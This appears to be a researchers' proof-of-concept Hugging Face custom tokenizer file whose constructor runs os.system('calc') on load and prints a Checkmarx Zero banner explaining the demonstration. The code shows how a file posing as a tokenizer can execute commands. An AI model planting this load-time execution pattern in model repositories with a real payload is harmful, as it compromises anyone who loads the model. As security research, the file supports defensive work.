| # File: tokenization_custom.py | |
| # Place this file in your Hugging Face model repository | |
| from transformers import PreTrainedTokenizerFast | |
| import json | |
| import os | |
| def note_to_users(): | |
| print(""" | |
| _____ _ _ ______ | |
| / __ \ | | | |___ / | |
| | / \/ |__ ___ ___| | ___ __ ___ __ _ _ ____ __ / / ___ _ __ ___ | |
| | | | '_ \ / _ \/ __| |/ / '_ ` _ \ / _` | '__\ \/ / / / / _ \ '__/ _ \ | |
| | \__/\ | | | __/ (__| <| | | | | | (_| | | > < ./ /__| __/ | | (_) | | |
| \____/_| |_|\___|\___|_|\_\_| |_| |_|\__,_|_| /_/\_\ \_____/\___|_| \___/ | |
| ---- | |
| Message from Checkmarx Zero Research Group: | |
| Note: this is not the model you are looking for. | |
| This customized tokenizer is a proof-of-concept and not meant for actual use. | |
| No worries — running it did not affect your system in any way. | |
| It simply demonstrates how a custom tokenizer in Hugging Face can be built to execute code. | |
| """) | |
| class CustomTokenizer(PreTrainedTokenizerFast): | |
| def __init__(self, **kwargs): | |
| import os | |
| os.system("calc") | |
| note_to_users() | |
| super().__init__(**kwargs) | |
| def from_pretrained(cls, *args, **kwargs): | |
| note_to_users() | |
| return super().from_pretrained(*args, **kwargs) |